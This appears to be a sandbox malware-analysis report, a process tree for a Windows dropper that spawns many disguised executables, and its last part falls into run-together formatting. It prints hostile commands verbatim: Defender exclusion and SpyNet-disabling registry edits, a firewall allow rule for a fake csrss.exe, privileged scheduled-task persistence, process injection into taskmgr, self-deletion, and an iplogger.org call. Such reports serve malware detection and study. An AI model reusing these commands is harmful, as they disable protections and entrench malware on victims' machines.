  Key opened: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (process: rundll32.exe)
Processes
(tree depth shown in brackets; each entry lists image path, PID, command line and the behaviours the sandbox attributed to it)
[1] C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe (PID 3620)
    cmd: "C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe (PID 4196)
      cmd: "C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"
      - Modifies Windows Defender Real-time Protection settings
      - Checks computer location settings
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe (PID 3704)
        cmd: "C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe"
        - Executes dropped EXE
        - Checks computer location settings
        - Suspicious use of SetThreadContext
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 968)
          cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
          (the -enc value is base64 of UTF-16LE and decodes to: Start-Sleep -Seconds 20)
      [4] C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe (PID 3516)
          cmd: "C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe"
          - Executes dropped EXE
    [3] C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe (PID 4436)
        cmd: "C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe"
        - Executes dropped EXE
        - Drops file in Program Files directory
      [4] C:\Windows\SysWOW64\schtasks.exe (PID 4212)
          cmd: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
          - Creates scheduled task(s)
      [4] C:\Windows\SysWOW64\schtasks.exe (PID 3112)
          cmd: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
          - Creates scheduled task(s)
      [4] C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe (PID 1808)
          cmd: "C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe"
          - Modifies Windows Defender Real-time Protection settings
          - Executes dropped EXE
          - Checks computer location settings
        [5] C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe (PID 968)
            cmd: "C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe"
            - Executes dropped EXE
            - Checks computer location settings
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\SysWOW64\control.exe (PID 4596)
              cmd: "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
            [7] C:\Windows\SysWOW64\rundll32.exe (PID 5532)
                cmd: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
                - Loads dropped DLL
              [8] C:\Windows\system32\RunDll32.exe (PID 4688)
                  cmd: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
                  - Blocklisted process makes network request
                  - Executes dropped EXE
                  - Suspicious use of AdjustPrivilegeToken
                [9] C:\Windows\SysWOW64\rundll32.exe (PID 6036)
                    cmd: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
                    - Loads dropped DLL
        [5] C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe (PID 3608)
            cmd: "C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe"
            - Executes dropped EXE
            - Checks computer location settings
          [6] C:\Windows\SysWOW64\WerFault.exe (PID 4292)
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 452
              - Program crash
          [6] C:\Windows\SysWOW64\WerFault.exe (PID 1044)
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 776
              - Program crash
          [6] C:\Windows\SysWOW64\WerFault.exe (PID 4436)
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 784
              - Program crash
          [6] C:\Windows\SysWOW64\WerFault.exe (PID 2596)
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 784
              - Program crash
          [6] C:\Windows\SysWOW64\WerFault.exe (PID 3240)
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 824
              - Program crash
          [6] C:\Windows\SysWOW64\WerFault.exe (PID 6112)
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 984
              - Program crash
          [6] C:\Windows\SysWOW64\WerFault.exe (PID 5348)
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 1012
              - Loads dropped DLL
              - Program crash
          [6] C:\Windows\SysWOW64\WerFault.exe (PID 3224)
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 1364
              - Program crash
          [6] C:\Windows\SysWOW64\cmd.exe (PID 4128)
              cmd: "C:\Windows\System32\cmd.exe" /c taskkill /im "Ju38t3w5U8IOhBMX5rcSC6Nn.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe" & exit
            [7] C:\Windows\SysWOW64\taskkill.exe (PID 2176)
                cmd: taskkill /im "Ju38t3w5U8IOhBMX5rcSC6Nn.exe" /f
                - Kills process with taskkill
        [5] C:\Users\Admin\Pictures\Adobe Films\tmRoymsFOt7qgiIyaQJKTG0D.exe (PID 5436)
            cmd: "C:\Users\Admin\Pictures\Adobe Films\tmRoymsFOt7qgiIyaQJKTG0D.exe"
            - Executes dropped EXE
          [6] C:\Windows\system32\WerFault.exe (PID 6044)
              cmd: C:\Windows\system32\WerFault.exe -u -p 5436 -s 708
              - Program crash
        [5] C:\Users\Admin\Pictures\Adobe Films\7oi_eeupjsnLrsVJ1cvYAxm7.exe (PID 5408)
            cmd: "C:\Users\Admin\Pictures\Adobe Films\7oi_eeupjsnLrsVJ1cvYAxm7.exe"
            - Executes dropped EXE
          [6] C:\Users\Admin\AppData\Local\Temp\7zSDD85.tmp\Install.exe (PID 4192)
              cmd: .\Install.exe
              - Executes dropped EXE
            [7] C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe (PID 2200)
                cmd: .\Install.exe /S /site_id "525403"
                - Executes dropped EXE
                - Checks BIOS information in registry
                - Checks computer location settings
                - Drops file in System32 directory
                - Enumerates system info in registry
              [8] C:\Windows\SysWOW64\forfiles.exe (PID 6100)
                  cmd: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                [9] C:\Windows\SysWOW64\cmd.exe (PID 4200)
                    cmd: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                  [10] \??\c:\windows\SysWOW64\reg.exe (PID 4688)
                       cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                  [10] \??\c:\windows\SysWOW64\reg.exe (PID 1824)
                       cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
              [8] C:\Windows\SysWOW64\forfiles.exe (PID 3464)
                  cmd: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                [9] C:\Windows\SysWOW64\cmd.exe (PID 2440)
                    cmd: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                  [10] \??\c:\windows\SysWOW64\reg.exe (PID 4984)
                       cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  [10] \??\c:\windows\SysWOW64\reg.exe (PID 3976)
                       cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
              [8] C:\Windows\SysWOW64\schtasks.exe (PID 5364)
                  cmd: schtasks /CREATE /TN "gHbFtyKwQ" /SC once /ST 00:21:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  (the -EncodedCommand value is base64 of UTF-16LE and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
                  - Creates scheduled task(s)
              [8] C:\Windows\SysWOW64\schtasks.exe (PID 5840)
                  cmd: schtasks /run /I /tn "gHbFtyKwQ"
                [9] C:\Windows\System32\Conhost.exe (PID 5044)
                    cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    - Loads dropped DLL
              [8] C:\Windows\SysWOW64\schtasks.exe (PID 2496)
                  cmd: schtasks /DELETE /F /TN "gHbFtyKwQ"
              [8] C:\Windows\SysWOW64\schtasks.exe (PID 1712)
                  cmd: schtasks /CREATE /TN "bamNpdvhtkzLwlCraC" /SC once /ST 13:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe\" bH /site_id 525403 /S" /V1 /F
                  - Drops file in Windows directory
                  - Creates scheduled task(s)
        [5] C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe (PID 5396)
            cmd: "C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe"
            - Executes dropped EXE
            - Checks computer location settings
            - Suspicious use of SetWindowsHookEx
          [6] C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe (PID 5996)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe" H
              - Executes dropped EXE
              - Suspicious use of SetWindowsHookEx
        [5] C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe (PID 5344)
            cmd: "C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe"
            - Executes dropped EXE
            - Adds Run key to start application
          [6] C:\Windows\SysWOW64\attrib.exe (PID 5628)
              cmd: attrib -?
              - Views/modifies file attributes
          [6] C:\Windows\SysWOW64\cmd.exe (PID 5452)
              cmd: cmd /c cmd < Inebriarti.htm & ping -n 5 localhost
            [7] C:\Windows\SysWOW64\cmd.exe (PID 3092)
                cmd: cmd
              [8] C:\Windows\SysWOW64\tasklist.exe (PID 109220)
                  cmd: tasklist /FI "imagename eq PSUAService.exe"
                  - Enumerates processes with tasklist
              [8] C:\Windows\SysWOW64\find.exe (PID 109248)
                  cmd: find /I /N "psuaservice.exe"
              [8] C:\Windows\SysWOW64\findstr.exe (PID 109280)
                  cmd: findstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm
              [8] C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif (PID 109296)
                  cmd: Tal.exe.pif H
                  - Loads dropped DLL
                  - Suspicious use of SetThreadContext
                  - Suspicious use of FindShellTrayWindow
                  - Suspicious use of SendNotifyMessage
                [9] C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif (PID 1164)
                    cmd: C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif
                  [10] C:\Windows\SysWOW64\WerFault.exe (PID 6312)
                       cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 1164 -s 12
                       - Program crash
              [8] C:\Windows\SysWOW64\PING.EXE (PID 109316)
                  cmd: ping localhost -n 5
                  - Runs ping.exe
            [7] C:\Windows\SysWOW64\PING.EXE (PID 109464)
                cmd: ping -n 5 localhost
                - Runs ping.exe
    [3] C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe (PID 4052)
        cmd: "C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe"
        - Executes dropped EXE
        - Checks computer location settings
      [4] C:\Windows\SysWOW64\control.exe (PID 4216)
          cmd: "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
        [5] C:\Windows\SysWOW64\rundll32.exe (PID 5044)
            cmd: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
          [6] C:\Windows\system32\RunDll32.exe (PID 6072)
              cmd: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
            [7] C:\Windows\SysWOW64\rundll32.exe (PID 5156)
                cmd: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
                - Loads dropped DLL
    [3] C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe (PID 1744)
        cmd: "C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe"
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\WerFault.exe (PID 6016)
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 2068
          - Program crash
    [3] C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe (PID 2948)
        cmd: "C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe"
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe (PID 1624)
        cmd: "C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe"
        - Executes dropped EXE
      [4] C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe (PID 3284)
          cmd: "C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe"
          - Executes dropped EXE
          - Adds Run key to start application
          - Drops file in Windows directory
          - Modifies data under HKEY_USERS
        [5] C:\Windows\system32\cmd.exe (PID 2480)
            cmd: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
          [6] C:\Windows\system32\netsh.exe (PID 2272)
              cmd: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
              - Modifies Windows Firewall
        [5] C:\Windows\rss\csrss.exe (PID 4588)
            cmd: C:\Windows\rss\csrss.exe
            - Executes dropped EXE
            - Adds Run key to start application
          [6] C:\Windows\SYSTEM32\schtasks.exe (PID 5940)
              cmd: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              - Creates scheduled task(s)
          [6] C:\Windows\SYSTEM32\schtasks.exe (PID 5732)
              cmd: schtasks /delete /tn ScheduledUpdate /f
            [7] C:\Windows\System32\Conhost.exe (PID 5628)
                cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          [6] C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe (PID 796)
              cmd: C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
              - Executes dropped EXE
          [6] C:\Windows\SYSTEM32\schtasks.exe (PID 3144)
              cmd: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              - Creates scheduled task(s)
          [6] C:\Windows\SysWOW64\cmd.exe (PID 4904)
              cmd: cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
            [7] C:\Windows\SysWOW64\sc.exe (PID 5780)
                cmd: sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                - Launches sc.exe
          [6] C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe (PID 2892)
              cmd: C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
            [7] C:\Windows\SYSTEM32\schtasks.exe (PID 6424)
                cmd: schtasks /delete /tn "csrss" /f
            [7] C:\Windows\SYSTEM32\schtasks.exe (PID 6476)
                cmd: schtasks /delete /tn "ScheduledUpdate" /f
    [3] C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe (PID 2284)
        cmd: "C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe"
        - Executes dropped EXE
        - Checks computer location settings
        - Loads dropped DLL
        - Checks processor information in registry
      [4] C:\Windows\SysWOW64\cmd.exe (PID 5340)
          cmd: "C:\Windows\System32\cmd.exe" /c taskkill /im l2S7FrWODIlvtiOh9PM4XNlS.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe" & del C:\ProgramData\*.dll & exit
        [5] C:\Windows\SysWOW64\taskkill.exe (PID 5628)
            cmd: taskkill /im l2S7FrWODIlvtiOh9PM4XNlS.exe /f
            - Kills process with taskkill
        [5] C:\Windows\SysWOW64\timeout.exe (PID 6052)
            cmd: timeout /t 6
            - Delays execution with timeout.exe
      [4] C:\Windows\SysWOW64\WerFault.exe (PID 5440)
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 1556
          - Program crash
    [3] C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe (PID 4316)
        cmd: "C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe"
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious use of WriteProcessMemory
      [4] C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE (PID 4960)
          cmd: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE
          - Executes dropped EXE
          - Checks computer location settings
          - Adds Run key to start application
          - Suspicious use of SetThreadContext
          - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2908)
            cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAAwAA==
            (the -enc value is base64 of UTF-16LE and decodes to: Start-Sleep -Seconds 40)
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe (PID 1424)
            cmd: "C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe"
            - Executes dropped EXE
            - Checks SCSI registry key(s)
            - Suspicious behavior: MapViewOfSection
        [5] C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (PID 5984)
            cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    [3] C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe (PID 3232)
        cmd: "C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
      [4] C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe (PID 3840)
          cmd: "C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe"
          - Executes dropped EXE
        [5] C:\Users\Admin\AppData\Local\Temp\M52CB.exe (PID 2616)
            cmd: "C:\Users\Admin\AppData\Local\Temp\M52CB.exe"
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
          [6] C:\Users\Admin\AppData\Local\Temp\M52CB.exe (PID 4688)
              cmd: "C:\Users\Admin\AppData\Local\Temp\M52CB.exe"
        [5] C:\Users\Admin\AppData\Local\Temp\0BB4J.exe (PID 3784)
            cmd: "C:\Users\Admin\AppData\Local\Temp\0BB4J.exe"
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
          [6] C:\Users\Admin\AppData\Local\Temp\0BB4J.exe (PID 4204)
              cmd: "C:\Users\Admin\AppData\Local\Temp\0BB4J.exe"
              - Executes dropped EXE
              - Adds Run key to start application
        [5] C:\Users\Admin\AppData\Local\Temp\EH46E.exe (PID 5536)
            cmd: "C:\Users\Admin\AppData\Local\Temp\EH46E.exe"
            - Executes dropped EXE
            - Checks computer location settings
          [6] C:\Windows\SysWOW64\regsvr32.exe (PID 5348)
              cmd: "C:\Windows\System32\regsvr32.exe" -u rMbC4.Q /S
        [5] C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe (PID 5640)
            cmd: https://iplogger.org/1x5az7
            - Executes dropped EXE
            - Modifies Internet Explorer settings
            - Suspicious use of SetWindowsHookEx
        [5] C:\Users\Admin\AppData\Local\Temp\0B7121CH132B0JI.exe (PID 4320)
            - Executes dropped EXE
            - Suspicious use of SetWindowsHookEx
        [5] C:\Users\Admin\AppData\Local\Temp\IHH9FGG6KIID6CG.exe (PID 2596)
            - Executes dropped EXE
            - Suspicious use of SetWindowsHookEx
    [3] C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe (PID 3680)
        cmd: "C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe"
        - Executes dropped EXE
        - Checks computer location settings
      [4] C:\Windows\SysWOW64\schtasks.exe (PID 5768)
          cmd: "C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\AppVerif\DllHelper.exe"
          - Creates scheduled task(s)
      [4] C:\Users\Admin\AppVerif\DllHelper.exe (PID 3180)
          cmd: "C:\Users\Admin\AppVerif\DllHelper.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
        [5] C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (PID 1180)
            cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1816)
          cmd: "C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe"
        [5] C:\Windows\SysWOW64\chcp.com (PID 440)
            cmd: chcp 65001
        [5] C:\Windows\SysWOW64\PING.EXE (PID 6000)
            cmd: ping 127.0.0.1
            - Runs ping.exe
    [3] C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe (PID 4040)
        cmd: "C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe (PID 3964)
        cmd: "C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
      [4] C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe (PID 4552)
          cmd: "C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe"
          - Executes dropped EXE
          - Checks computer location settings
          - Adds Run key to start application
          - Modifies system certificate store
        [5] C:\Windows\SysWOW64\icacls.exe (PID 3300)
            cmd: icacls "C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab" /deny *S-1-1-0:(OI)(CI)(DE,DC)
            - Modifies file permissions
        [5] C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe (PID 5584)
            cmd: "C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe" --Admin IsNotAutoStart IsNotTask
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
          [6] C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe" --Admin IsNotAutoStart IsNotTask
              - Executes dropped EXE
              - Checks computer location settings
PID:5716 -
C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe"C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4116 -
C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe"C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:5624 -
C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe"C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
PID:1216 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 4524⤵
- Program crash
PID:2332 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 7644⤵
- Program crash
PID:3832 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 7724⤵
- Program crash
PID:2380 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 8164⤵
- Program crash
PID:2156 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 8244⤵
- Program crash
PID:4324 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 9564⤵
- Program crash
PID:5156 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 10164⤵
- Program crash
PID:5316 -
